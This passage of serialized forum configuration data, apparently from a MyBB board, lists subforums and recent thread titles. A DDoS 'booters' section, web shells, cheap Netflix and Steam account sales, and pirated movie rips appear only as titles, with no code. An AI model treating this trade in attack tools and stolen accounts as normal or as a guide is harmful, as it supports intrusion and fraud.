"Deviant_Art.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:37;a:37:{s:3:\"fid\";s:2:\"37\";s:4:\"name\";s:23:\"Marketplace Discussions\";s:11:\"description\";s:116:\"Looking for something to buy? Need to work out a price? Want to report a scammer? This is the right section for you.\";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:2:\"36\";s:10:\"parentlist\";s:5:\"36,37\";s:9:\"disporder\";s:1:\"1\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:1:\"0\";s:15:\"lastpostsubject\";s:0:\"\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:12:\"forum_32.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:39;a:37:{s:3:\"fid\";s:2:\"39\";s:4:\"name\";s:15:\"Premium Sellers\";s:11:\"description\";s:45:\"Only upgraded members can make threads here. \";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:2:\"36\";s:10:\"parentlist\";s:5:\"36,39\";s:9:\"disporder\";s:1:\"2\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:2:\"82\";s:15:\"lastpostsubject\";s:32:\"[Selling] Cheap Netflix Accounts\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:17:\"kim_yongii256.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:40;a:37:{s:3:\"fid\";s:2:\"40\";s:4:\"name\";s:17:\"Secondary Sellers\";s:11:\"description\";s:91:\"All members can make threads here. Please be extra careful with all deals in this section. \";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:2:\"36\";s:10:\"parentlist\";s:5:\"36,40\";s:9:\"disporder\";s:1:\"3\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:1:\"0\";s:15:\"lastpostsubject\";s:0:\"\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:20:\"emblem_handshake.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:41;a:37:{s:3:\"fid\";s:2:\"41\";s:4:\"name\";s:8:\"Auctions\";s:11:\"description\";s:64:\"This forum is for auctions. Please follow the forum guidelines. \";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:2:\"36\";s:10:\"parentlist\";s:5:\"36,41\";s:9:\"disporder\";s:1:\"4\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:2:\"84\";s:15:\"lastpostsubject\";s:13:\"steam account\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:24:\"auction_hammer_gavel.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:38;a:37:{s:3:\"fid\";s:2:\"38\";s:4:\"name\";s:12:\"Scam Reports\";s:11:\"description\";s:67:\"Want to report a scammer? All scammer reports are to be made here. \";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:2:\"37\";s:10:\"parentlist\";s:8:\"36,37,38\";s:9:\"disporder\";s:1:\"1\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:1:\"1\";s:15:\"lastpostsubject\";s:21:\"Filling a scam report\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:9:\"alert.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:69;a:37:{s:3:\"fid\";s:2:\"69\";s:4:\"name\";s:7:\"General\";s:11:\"description\";s:101:\"Discussions related to coding can be discussed here. Please do not post any tutorials in this forum. \";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:2:\"51\";s:10:\"parentlist\";s:5:\"51,69\";s:9:\"disporder\";s:1:\"1\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:1:\"9\";s:15:\"lastpostsubject\";s:20:\"[Release] IP Manager\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:14:\"web_coding.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:52;a:37:{s:3:\"fid\";s:2:\"52\";s:4:\"name\";s:31:\"Visual Basic and .Net Framework\";s:11:\"description\";s:83:\"Visual Basic .NET is an Object-Oriented programming language designed by Microsoft.\";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:2:\"51\";s:10:\"parentlist\";s:5:\"51,52\";s:9:\"disporder\";s:1:\"2\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:2:\"82\";s:15:\"lastpostsubject\";s:31:\"[Release]Skype Resolver & GeoIP\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:6:\"vb.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:53;a:37:{s:3:\"fid\";s:2:\"53\";s:4:\"name\";s:4:\"Java\";s:11:\"description\";s:172:\"Java allows you to play online games, chat with people around the world, calculate your mortgage interest, and a lot more. This is sun\'s most popular programming language. \";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:2:\"51\";s:10:\"parentlist\";s:5:\"51,53\";s:9:\"disporder\";s:1:\"3\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:3:\"222\";s:15:\"lastpostsubject\";s:19:\"Complete Java Guide\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:8:\"java.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:67;a:37:{s:3:\"fid\";s:2:\"67\";s:4:\"name\";s:3:\"PHP\";s:11:\"description\";s:132:\"PHP is mainly used to define classes and functions and is the leading web programming language because of its strength & simplicity.\";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:2:\"51\";s:10:\"parentlist\";s:5:\"51,67\";s:9:\"disporder\";s:1:\"4\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:1:\"5\";s:15:\"lastpostsubject\";s:26:\"Slowlowirs Shell .PHP file\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:21:\"application-x-php.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:68;a:37:{s:3:\"fid\";s:2:\"68\";s:4:\"name\";s:5:\"Other\";s:11:\"description\";s:75:\"Other coding discussions that don\'t have a forum should be discussed here. \";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:2:\"51\";s:10:\"parentlist\";s:5:\"51,68\";s:9:\"disporder\";s:1:\"5\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:1:\"8\";s:15:\"lastpostsubject\";s:18:\"Simple Perl Booter\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:17:\"media-scripts.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:58;a:37:{s:3:\"fid\";s:2:\"58\";s:4:\"name\";s:34:\"Group Recruitments and Discussions\";s:11:\"description\";s:132:\"For all topics regarding custom user groups such as recruitment, joining questions, and other threads about groups please post here.\";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:2:\"57\";s:10:\"parentlist\";s:5:\"57,58\";s:9:\"disporder\";s:1:\"1\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:3:\"228\";s:15:\"lastpostsubject\";s:54:\"The Marketers - Official Recruitment | Join us Today !\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:10:\"groups.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:61;a:37:{s:3:\"fid\";s:2:\"61\";s:4:\"name\";s:19:\"Unique Headquarters\";s:11:\"description\";s:29:\"Unique groups private forum. \";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:2:\"57\";s:10:\"parentlist\";s:5:\"57,61\";s:9:\"disporder\";s:1:\"2\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:3:\"228\";s:15:\"lastpostsubject\";s:31:\"How To Get Passes To Porn Sites\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:9:\"qvfmJ.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:66;a:37:{s:3:\"fid\";s:2:\"66\";s:4:\"name\";s:6:\"Gamers\";s:11:\"description\";s:127:\"Gamers Private Forum. We talk about all things game related. If It\'s game Talk, Cheats, Guides, Releases We talk about it here!\";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:2:\"57\";s:10:\"parentlist\";s:5:\"57,66\";s:9:\"disporder\";s:1:\"3\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:2:\"61\";s:15:\"lastpostsubject\";s:30:\"Some Changes that will be made\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:9:\"gamer.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:79;a:37:{s:3:\"fid\";s:2:\"79\";s:4:\"name\";s:6:\"Coders\";s:11:\"description\";s:135:\"The goal of LHC (LH Coders) is to create a unique group of coders who are willing to support and bring amazing content to this forum.\r\n\";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:2:\"57\";s:10:\"parentlist\";s:5:\"57,79\";s:9:\"disporder\";s:1:\"4\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:2:\"67\";s:15:\"lastpostsubject\";s:34:\"Need some coder to check this code\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:9:\"1lVmr.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:81;a:37:{s:3:\"fid\";s:2:\"81\";s:4:\"name\";s:7:\"DDoSers\";s:11:\"description\";s:85:\"Find the best booters here. Learn to create booters, DDoSers, post your requests etc.\";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:2:\"57\";s:10:\"parentlist\";s:5:\"57,81\";s:9:\"disporder\";s:1:\"5\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:1:\"1\";s:15:\"lastpostsubject\";s:19:\"Some private shells\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:7:\"dos.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:82;a:37:{s:3:\"fid\";s:2:\"82\";s:4:\"name\";s:20:\"The Marketers Palace\";s:11:\"description\";s:51:\"We are a High Quality group all about Money Making.\";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:2:\"57\";s:10:\"parentlist\";s:5:\"57,82\";s:9:\"disporder\";s:1:\"6\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:1:\"2\";s:15:\"lastpostsubject\";s:74:\"Simple Clickbank - Step By Step Tutorial [ The Ultimate Clickbank System ]\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:9:\"uP3eg.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:64;a:37:{s:3:\"fid\";s:2:\"64\";s:4:\"name\";s:28:\"Movie & TV RIPs, Streams etc\";s:11:\"description\";s:123:\"Want to watch a newly released movie online? Want to watch your favorite TV serial online? This is the right place for you.\";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:2:\"65\";s:10:\"parentlist\";s:7:\"6,65,64\";s:9:\"disporder\";s:1:\"1\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:1:\"4\";s:15:\"lastpostsubject\";s:18:\"Sinister Movie Rip\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"1\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:22:\"redhat-sound_video.png\";s:18:\"ForumsRequirements\";s:1:\"0\";}i:71;a:37:{s:3:\"fid\";s:2:\"71\";s:4:\"name\";s:13:\"Gamers Lounge\";s:11:\"description\";s:37:\"A place to chill for all the gamers. \";s:6:\"linkto\";s:0:\"\";s:4:\"type\";s:1:\"f\";s:3:\"pid\";s:2:\"70\";s:10:\"parentlist\";s:5:\"70,71\";s:9:\"disporder\";s:1:\"1\";s:6:\"active\";s:1:\"1\";s:4:\"open\";s:1:\"1\";s:13:\"lastposteruid\";s:3:\"228\";s:15:\"lastpostsubject\";s:28:\"L33thacking Minecraft Server\";s:9:\"allowhtml\";s:1:\"0\";s:11:\"allowmycode\";s:1:\"1\";s:12:\"allowsmilies\";s:1:\"1\";s:12:\"allowimgcode\";s:1:\"1\";s:14:\"allowvideocode\";s:1:\"1\";s:11:\"allowpicons\";s:1:\"1\";s:13:\"allowtratings\";s:1:\"0\";s:6:\"status\";s:1:\"1\";s:13:\"usepostcounts\";s:1:\"1\";s:8:\"password\";s:0:\"\";s:10:\"showinjump\";s:1:\"1\";s:8:\"modposts\";s:1:\"0\";s:10:\"modthreads\";s:1:\"0\";s:14:\"mod_edit_posts\";s:1:\"0\";s:14:\"modattachments\";s:1:\"0\";s:5:\"style\";s:1:\"0\";s:13:\"overridestyle\";s:1:\"0\";s:9:\"rulestype\";s:1:\"0\";s:10:\"rulestitle\";s:0:\"\";s:5:\"rules\";s:0:\"\";s:14:\"defaultdatecut\";s:1:\"0\";s:13:\"defaultsortby\";s:0:\"\";s:16:\"defaultsortorder\";s:0:\"\";s:5:\"ficon\";s:9:\"games.png\";s: